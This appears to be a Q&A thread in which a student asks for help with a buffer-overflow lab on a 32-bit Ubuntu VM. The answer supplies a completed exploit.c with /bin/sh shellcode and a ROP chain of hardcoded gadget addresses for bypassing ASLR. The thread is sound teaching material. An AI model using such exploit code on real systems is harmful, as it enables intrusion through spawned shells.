0

In this Lab, I have exploit.c, stack.c and call_shellcode.c. Stack.c has been modifed so it prints out the buffer address and ebp address. I am running this on Virtual Machine, ubuntu 12.04 32 bit.

I have to use the vulnerable program stack.c and put code in exploit.c in order to create a shell when running my stack executable. Any help is appreciated.

Stack.c is down below Sorry for bad indentation, actual code has proper indentation.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

unsigned long int sp;


int cp(char *str)
{
//    unsigned long int sp;
char buffer[12];
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);

strcpy(buffer, str);

printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;

badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
cp(str);

printf("Returned Properly\n");
return 1;
}

And exploit.c is down below.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"             /* xorl    %eax,%eax              */
"\x50"                 /* pushl   %eax                   */
"\x68""//sh"           /* pushl   $0x68732f2f            */
"\x68""/bin"           /* pushl   $0x6e69622f            */
"\x89\xe3"             /* movl    %esp,%ebx              */
"\x50"                 /* pushl   %eax                   */
"\x53"                 /* pushl   %ebx                   */
"\x89\xe1"             /* movl    %esp,%ecx              */
"\x99"                 /* cdq                            */
"\xb0\x0b"             /* movb    $0x0b,%al              */
"\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */ 


/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

I have ran gdb on my stack executable, compiled with gcc -o stack -z execstack -fno-stack-protector stack.c, and have found the buffer to be at address 0xbffff134 and ebp at 0xbffff148. I understand I have to somehow find my return address and make my payload be at that addresss? Some help regarding bufferoverflow with this assignment is needed please.

Improve this question
5
  • doesn't compile on clang (currently I don't have gcc handy) because of invalid operand type on line 12 in Stack.c. sp should be an 32 bit type. Should be int main, too. Commented Mar 25, 2019 at 0:55
  • 1
    @ToxiCore are you sure that you compile for 32 bit? Looks like your target is x86-64 Commented Mar 25, 2019 at 1:00
  • @ToxiCofe I believe that is an error when not compiling for 32 bit, however this is done in a VM on ubuntu 12.04 32 bit, so I have no error Commented Mar 25, 2019 at 1:03
  • Yes, I've overlooked that, no problem should arise on a 32 bit platform Commented Mar 25, 2019 at 1:03
  • @ToxiCore any help regarding my problem? Commented Mar 25, 2019 at 2:47

1 Answer 1

Reset to default
0

You need bypass ASLR, refer to the link below

https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/

Find gadget:

pop ebx; ret;                                         // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret;   // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]
  • construct eax and ebx value
  • write the ESP value to the 0804a020 memory, then execute it

Modified exploit.c:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    ;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    int i;
    unsigned int *val = (unsigned int*)buffer;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    val[6] = 0x08048378;       /* pop ebx; ret; */
    val[7] = 0xaaa9a03c;       /* ebx */
    for(i=8; i<16; i++)        
        val[i] = 0x0804847c;   /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
    val[16] = 0x08048378;      /* pop ebx; ret; */
    val[17] = 0xfffffff8;      /* ebx */
    val[18] = 0x08048462;      /* add dword [ebx+0x0804A028], esp; */
                               /* call dword [0x08049F1C+eax*4] */
    memcpy(&val[19], shellcode, sizeof(shellcode));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}
Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.